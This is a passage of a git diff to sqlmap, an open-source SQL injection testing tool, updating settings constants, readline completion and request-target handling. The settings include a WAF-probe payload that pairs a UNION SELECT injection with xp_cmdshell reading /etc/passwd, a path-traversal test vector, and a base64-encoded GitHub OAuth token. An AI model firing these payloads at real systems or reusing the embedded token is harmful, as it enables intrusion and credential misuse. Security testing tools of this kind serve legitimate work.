"SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") +ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") +FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") +DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") +MYSQL_ALIASES = ("mysql", "my", "mariadb", "maria") PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") SQLITE_ALIASES = ("sqlite", "sqlite3") @@ -201,10 +231,11 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES +SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES SUPPORTED_OS = ("linux", "windows") DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) @@ -213,44 +244,46 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +HSQLDB_DEFAULT_SCHEMA = "PUBLIC" + # Names that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") # Items displayed in basic help (-h) output BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - "db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "sqlmapShell", - "wizard", - ) + "url", + "googleDork", + "data", + "cookie", + "randomAgent", + "proxy", + "testParameter", + "dbms", + "level", + "risk", + "tech", + "getAll", + "getBanner", + "getCurrentUser", + "getCurrentDb", + "getPasswordHashes", + "getTables", + "getColumns", + "getSchema", + "dumpTable", + "dumpAll", + "db", + "tbl", + "col", + "osShell", + "osPwn", + "batch", + "checkTor", + "flushSession", + "tor", + "sqlmapShell", + "wizard", +) # String representation for NULL value NULL = "NULL" @@ -261,13 +294,19 @@ BLANK = "" # String representation for current database CURRENT_DB = "CD" +# Regular expressions used for finding file paths in error messages +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"(?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.-]+)", r"href=['\"]file://(?P/[^'\"]+)") + # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) + r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", + r"(?m)^(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(?P[^\n>]*SQL Syntax[^\n<]+)", + r"
  • Error Type:
    (?P.+?)
  • ", + r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", + r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)" +) # Regular expression used for parsing charset info from meta html headers META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' @@ -305,6 +344,9 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z" # Regex used for masking sensitive data SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" +# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) +SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") + # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 @@ -317,17 +359,20 @@ MIN_RATIO = 0.0 # Maximum value for comparison ratio MAX_RATIO = 1.0 +# Minimum length of sentence for automatic choosing of --string (in case of high matching ratio) +CANDIDATE_SENTENCE_MIN_LENGTH = 10 + # Character used for marking injectable position inside provided data CUSTOM_INJECTION_MARK_CHAR = '*' # Other way to declare injection position INJECT_HERE_MARK = '%INJECT HERE%' -# Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings -MYSQL_ERROR_CHUNK_LENGTH = 50 +# Minimum chunk length used for retrieving data over error based payloads +MIN_ERROR_CHUNK_LENGTH = 8 -# Maximum length used for retrieving data over MSSQL error based payload due to trimming problems with longer result strings -MSSQL_ERROR_CHUNK_LENGTH = 100 +# Maximum chunk length used for retrieving data over error based payloads +MAX_ERROR_CHUNK_LENGTH = 1024 # Do not escape the injected statement if it contains any of the following SQL keywords EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) @@ -341,6 +386,9 @@ REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" # Regular expression used for replacing non-alphanum characters REFLECTED_REPLACEMENT_REGEX = r".+" +# Maximum time (in seconds) spent per reflective value(s) replacement +REFLECTED_REPLACEMENT_TIMEOUT = 3 + # Maximum number of alpha-numerical parts in reflected regex (for speed purposes) REFLECTED_MAX_REGEX_PARTS = 10 @@ -360,10 +408,10 @@ HASH_MOD_ITEM_DISPLAY = 11 MAX_INT = sys.maxint # Options that need to be restored in multiple targets run mode -RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") +RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") # Parameters to be ignored in detection phase (upper case) -IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") +IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__VIEWSTATEGENERATOR", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") # Regular expression used for recognition of ASP.NET control parameters ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$" @@ -386,13 +434,16 @@ CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encoding # Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition) SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\(" +# Option/switch values to ignore during configuration save +IGNORE_SAVE_OPTIONS = ("saveConfig",) + # IP address of the localhost LOCALHOST = "127.0.0.1" -# Default port used by Tor -DEFAULT_TOR_SOCKS_PORT = 9050 +# Default SOCKS ports used by Tor +DEFAULT_TOR_SOCKS_PORTS = (9050, 9150) -# Default ports used in Tor proxy bundles +# Default HTTP ports used by Tor DEFAULT_TOR_HTTP_PORTS = (8123, 8118) # Percentage below which comparison engine could have problems @@ -413,6 +464,8 @@ HTML_TITLE_REGEX = "(?P<result>[^<]+)" # Table used for Base64 conversion in WordPress hash cracking routine ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" +PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set())) + # Chars used to quickly distinguish if the user provided tainted parameter values DUMMY_SQL_INJECTION_CHARS = ";()'" @@ -420,7 +473,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'" DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" # Extensions skipped by crawler -CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx") +CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx") # Patterns often seen in HTTP headers containing custom injection marking character PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" @@ -431,17 +484,26 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)" # Template used for common column existence check BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)" -# Payload used for checking of existence of IDS/WAF (dummier the better) -IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd" +# Payload used for checking of existence of IDS/IPS/WAF (dummier the better) +IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#" -# Vectors used for provoking specific WAF/IDS/IPS behavior(s) +# Data inside shellcodeexec to be filled with random string +SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" + +# Generic address for checking the Internet connection while using switch --check-internet +CHECK_INTERNET_ADDRESS = "http://ipinfo.io/" + +# Value to look for in response to CHECK_INTERNET_ADDRESS +CHECK_INTERNET_VALUE = "IP Address Details" + +# Vectors used for provoking specific WAF/IPS/IDS behavior(s) WAF_ATTACK_VECTORS = ( - "", # NIL - "search=", - "file=../../../../etc/passwd", - "q=foobar", - "id=1 %s" % IDS_WAF_CHECK_PAYLOAD - ) + "", # NIL + "search=", + "file=../../../../etc/passwd", + "q=foobar", + "id=1 %s" % IDS_WAF_CHECK_PAYLOAD +) # Used for status representation in dictionary attack phase ROTATING_CHARS = ('\\', '|', '|', '/', '-') @@ -449,29 +511,36 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-') # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) BIGARRAY_CHUNK_SIZE = 1024 * 1024 +# Maximum number of socket pre-connects +SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 + # Only console display last n table rows TRIM_STDOUT_DUMP_SIZE = 256 +# Reference: http://stackoverflow.com/a/3168436 +# Reference: https://support.microsoft.com/en-us/kb/899149 +DUMP_FILE_BUFFER_SIZE = 1024 + # Parse response headers only first couple of times PARSE_HEADERS_LIMIT = 3 # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections ORDER_BY_STEP = 10 -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 +# Maximum number of times for revalidation of a character in inference (as required) +MAX_REVALIDATION_STEPS = 5 # Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' +PARAMETER_SPLITTING_REGEX = r"[,|;]" # Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' +UNION_CHAR_REGEX = r"\A\w+\Z" # Attribute used for storing original parameter value in special cases (e.g. POST) -UNENCODED_ORIGINAL_VALUE = 'original' +UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') +COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser") # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' @@ -483,7 +552,7 @@ DEFAULT_COOKIE_DELIMITER = ';' FORCE_COOKIE_EXPIRATION_TIME = "9999999999" # Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng==" +GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ==" # Skip unforced HashDB flush requests below the threshold number of cached items HASHDB_FLUSH_THRESHOLD = 32 @@ -491,11 +560,14 @@ HASHDB_FLUSH_THRESHOLD = 32 # Number of retries for unsuccessful HashDB flush attempts HASHDB_FLUSH_RETRIES = 3 +# Number of retries for unsuccessful HashDB retrieve attempts +HASHDB_RETRIEVE_RETRIES = 3 + # Number of retries for unsuccessful HashDB end transaction attempts HASHDB_END_TRANSACTION_RETRIES = 3 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10)) +HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 @@ -521,14 +593,26 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters) # Alphabet used for heuristic checks HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') -# String used for dummy XSS check of a tested parameter value -DUMMY_XSS_CHECK_APPENDIX = "<'\">" +# Minor artistic touch +BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) + +# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" + +# Regular expression used for recognition of file inclusion errors +FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" + +# Length of prefix and suffix used in non-SQLI heuristic checks +NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections) MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 +MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024 + +# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) +MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 # Maximum (multi-threaded) length of entry in bisection algorithm MAX_BISECTION_LENGTH = 50 * 1024 * 1024 @@ -537,7 +621,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024 LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" # Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- " +GENERIC_SQL_COMMENT = "-- [RANDSTR]" # Threshold value for turning back on time auto-adjustment mechanism VALID_TIME_CHARS_RUN_THRESHOLD = 100 @@ -546,7 +630,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100 CHECK_ZERO_COLUMNS_THRESHOLD = 10 # Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved") +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA") # Generic www root directory names GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") @@ -558,7 +642,7 @@ MAX_HELP_OPTION_LENGTH = 18 MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal") +FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' @@ -569,8 +653,17 @@ EVENTVALIDATION_REGEX = r'(?i)(?P__EVENTVALIDATION[^"]*)[^>]+value="(?P]+>(.+>)?\s*\Z" @@ -599,6 +692,9 @@ SUHOSIN_MAX_VALUE_LENGTH = 512 # Minimum size of an (binary) entry before it can be considered for dumping to disk MIN_BINARY_DISK_DUMP_SIZE = 100 +# Filenames of payloads xml files (in order of loading) +PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml") + # Regular expression used for extracting form tags FORM_SEARCH_REGEX = r"(?si)" @@ -609,7 +705,7 @@ MAX_HISTORY_LENGTH = 1000 MIN_ENCODED_LEN_CHECK = 5 # Timeout in seconds in which Metasploit remote session has to be initialized -METASPLOIT_SESSION_TIMEOUT = 300 +METASPLOIT_SESSION_TIMEOUT = 120 # Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html LOBLKSIZE = 2048 @@ -630,7 +726,7 @@ BRUTE_DOC_ROOT_PREFIXES = { } # Suffixes used in brute force search for web server document root -BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build") +BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build") # String used for marking target name inside used brute force web server document root BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" diff --git a/lib/core/shell.py b/lib/core/shell.py index 1e7f35d50..2d72eeaea 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,22 +1,43 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import atexit import os -import rlcompleter from lib.core import readlineng as readline -from lib.core.common import Backend from lib.core.data import logger from lib.core.data import paths from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import OS from lib.core.settings import MAX_HISTORY_LENGTH +try: + import rlcompleter + + class CompleterNG(rlcompleter.Completer): + def global_matches(self, text): + """ + Compute matches when text is a simple name. + Return a list of all names currently defined in self.namespace + that match. + """ + + matches = [] + n = len(text) + + for ns in (self.namespace,): + for word in ns: + if word[:n] == text: + matches.append(word) + + return matches +except: + readline._readline = None + def readlineAvailable(): """ Check if the readline is available. By default @@ -75,24 +96,6 @@ def loadHistory(completion=None): warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) logger.warn(warnMsg) -class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. - """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches - def autoCompletion(completion=None, os=None, commands=None): if not readlineAvailable(): return diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index eee73afdd..5f67fc704 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/target.py b/lib/core/target.py index c1bf921bd..43cbabbf9 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,17 +9,21 @@ import codecs import functools import os import re +import subprocess +import sys import tempfile import time import urlparse from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import intersect from lib.core.common import normalizeUnicode from lib.core.common import openFile from lib.core.common import paramToDict +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import urldecode @@ -34,12 +38,12 @@ from lib.core.dump import dumper from lib.core.enums import HASHDB_KEYS from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS @@ -66,7 +70,6 @@ from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import XML_RECOGNITION_REGEX from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper from thirdparty.odict.odict import OrderedDict def _setRequestParams(): @@ -92,8 +95,8 @@ def _setRequestParams(): # Perform checks on POST parameters if conf.method == HTTPMETHOD.POST and conf.data is None: - errMsg = "HTTP POST method depends on HTTP data value to be posted" - raise SqlmapSyntaxException(errMsg) + logger.warn("detected empty POST body") + conf.data = "" if conf.data is not None: conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method @@ -117,23 +120,26 @@ def _setRequestParams(): if kb.processUserMarks is 